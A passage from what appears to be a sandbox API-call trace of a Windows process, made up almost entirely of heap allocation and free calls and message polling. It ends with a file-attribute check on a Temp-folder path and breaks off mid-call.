hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6bc0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646f0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64558 | out: hHeap=0x2af0000) returned 1 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.365] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0660 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0540 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0580 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6b60 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64648 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6b60 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0580 | out: hHeap=0x2af0000) returned 1 [0081.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.366] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64798 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0610 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644c8 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64600 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0590 [0081.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0590 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645e8 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0580 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0510 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64648 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0580 | out: hHeap=0x2af0000) returned 1 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644e0 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0620 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0630 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64618 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644e0 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644e0 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0620 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0081.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644c8 | out: hHeap=0x2af0000) returned 1 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0630 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644e0 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64798 | out: hHeap=0x2af0000) returned 1 [0081.368] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0670 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64588 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64588 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0540 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e40 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04c0 [0081.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e40 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.368] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0610 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6cc0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645d0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0680 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644c8 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646f0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04c0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646f0 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644c8 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0680 | out: hHeap=0x2af0000) returned 1 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0620 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645a0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0640 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645a0 | out: hHeap=0x2af0000) returned 1 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64588 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645a0 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0670 [0081.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645a0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64588 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646f0 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0640 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0620 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646f0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6cc0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64648 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64618 | out: hHeap=0x2af0000) returned 1 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0081.370] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645d0 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2af0000) returned 1 [0081.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0680 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6b40 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6b40 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0680 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.371] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05a0 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0510 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ba0 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0520 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0520 | out: hHeap=0x2af0000) returned 1 [0081.372] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.372] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.372] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.372] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.372] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.373] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv")) returned 0xffffffff [0081.419] FindFirstFileW (in: 